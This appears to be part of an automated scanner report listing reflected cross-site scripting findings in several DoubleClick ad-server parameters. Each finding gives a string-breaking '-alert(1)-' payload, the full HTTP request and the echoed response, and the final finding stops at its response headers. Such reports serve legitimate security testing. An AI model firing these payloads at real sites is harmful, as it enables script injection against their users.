GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:07 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
10hairy_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=1812104017d8f'-alert(1)-'1694ab6b6d6&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.18. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79164'-alert(1)-'4c19bc69a73 was submitted in the _d parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:03:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
g';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=1812363679164'-alert(1)-'4c19bc69a73&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%
...[SNIP]...

4.19. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_eo parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _eo request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e42d1'-alert(1)-'93e759a580b was submitted in the _eo parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4869
Date: Mon, 13 Jun 2011 11:02:46 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
p://s0.2mdn.net/1887566/dec10reach_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787e42d1'-alert(1)-'93e759a580b&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dreach%26CTMedia%3Dx1%26CTProgType%3Dmplus
...[SNIP]...

4.20. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_et parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _et request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7df87'-alert(1)-'6dd69a55840 was submitted in the _et parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=FgAAAAAAAABzZXJpYWxpemF0aW9uOjphcmNoaXZlBQQIBAgBAAAAAAEBAAEAAAAAAFCBFAEAAAAAdIsUAQAAAABZjBQBAAAAAN6XFAEAAAAA35cUAQAAAACbPexBAAAAAAAAFEAAAAAAAAAAADPOAAAAAAAAAAAAAAAAAAAzzgAAAAAAACQAAAAAAAAAN2FkYzRkMGUtOTlkMC00YTE2LWI2NjYtYzA4YmE2NWFjZDg2AAAAAAAAAAAUAAAAAAAAAEFHLTAwMDAwMDAxMzg5MzU4NTU0DwAAAAAAAAAxNzMuMTkzLjIxNC4yNDMGAAAAAAAAADcyOHg5MEIAAAAAAAAAaHR0cDovL3Nwb3J0ZGZ3LmNvbS8yMDExLzA2LzEzLzEwLW9ic2VydmF0aW9ucy1kYWxsYXMtbWF2cy1maW5hbHMvDgAAAAAAAAA0NDleMTk1XjIwOTk4NgAAAAAAAAAABgAAABwAAAAAAAYAAAAAAAAASUZSQU1FAAEADO71TQAAAAA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:02:57 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
.net/1887566/frugal_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=13079628927df87'-alert(1)-'6dd69a55840&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTU
...[SNIP]...

4.21. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dca70'-alert(1)-'050bea894a2 was submitted in the _o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4872
Date: Mon, 13 Jun 2011 11:02:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
gif = 'http://s0.2mdn.net/1887566/reva728x90_grillz.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607dca70'-alert(1)-'050bea894a2&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dgrillz%26CTMedia%3Dx1%26CTProgT
...[SNIP]...

4.22. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 872f3'-alert(1)-'247dc5ea998 was submitted in the _pm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:03:36 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
creativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787872f3'-alert(1)-'247dc5ea998&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%26CTProgType%3Dmass%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx
...[SNIP]...

4.23. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_pn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30b70'-alert(1)-'a0c0bb2c16a was submitted in the _pn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4886
Date: Mon, 13 Jun 2011 11:03:45 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
= '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=1812386530b70'-alert(1)-'a0c0bb2c16a&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dhairyguy%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dflash%26cm_mmc%3Dx1-_-mplu
...[SNIP]...

4.24. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [_s parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the _s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a3c1'-alert(1)-'7bf6f774d59 was submitted in the _s parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4896
Date: Mon, 13 Jun 2011 11:03:16 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
al_728x90.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=06a3c1'-alert(1)-'7bf6f774d59&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dfrugalmonster%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%
...[SNIP]...

4.25. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 141ca'-alert(1)-'5ead3770817 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4675
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:03:47 GMT
Expires: Mon, 13 Jun 2011 11:03:47 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=141ca'-alert(1)-'5ead3770817http://www.fingerhut.com/user/pre_screen_credit.jsp?CTid=471&CTKey=default&CTMedia=x1&CTProgType=mass&CTUnitSize=728x90&CTTestGrp=flash&cm_mmc=x1-_-mass-_-728x90-_-flash';
var target = '_blank';
var dc
...[SNIP]...

4.26. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/x1.rtb/fingerhut/mass/rmkt

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d082a'-alert(1)-'eead87a656a was submitted in the sz parameter. This input was echoed unmodified in the application's response. Note that the scanner treats everything after sz= up to the first & as this parameter's value, so the payload was appended after _f=7adc4d0e-99d0-4a16-b666-c08ba65acd86 inside the embedded click-through URL (see the request below) rather than after 728x90; the effective injection point is the click URL carried in the path.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://bidnw.ru4.com/nf?_pnot=0&_tpc=&_wp=1.61&_nv=1&_CDbg=18121040&_eo=52787&_sm=268435456&_nm=...[SNIP]...
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4847
Date: Mon, 13 Jun 2011 11:02:24 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0>
<!-- Copyright DoubleClick Inc., All rights reserved. -->
<!-
...[SNIP]...
'';
var dcgif = 'http://s0.2mdn.net/1887566/728x90_aHairyGuy.jpg';
var dccreativewidth = '728';
var dcwmode = 'opaque';
var imgurl = 'http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86d082a'-alert(1)-'eead87a656a&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=http%3a%2f%2fwww.fingerhut.com/user/pre_screen_credit.jsp%3FCTid%3D471%26CTKey%3Ddefault%26CTMedia%3Dx1%2
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/cm.mtv/ent_010111 [net parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ad.doubleclick.net
Path:   /adj/cm.mtv/ent_010111

Issue detail

The value of the net request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e1c4'%3bfe92e006168 was submitted in the net parameter. This input was echoed as 8e1c4';fe92e006168 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.mtv/ent_010111;net=8e1c4'%3bfe92e006168 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://viacom.adbureau.net/AFTRSERVER/hserver//acc_random=379297/site=mtv.mtvi/aamsz=728x90//ATCI=1305305557-4079447
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 339
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:24:12 GMT
Expires: Mon, 13 Jun 2011 11:24:12 GMT

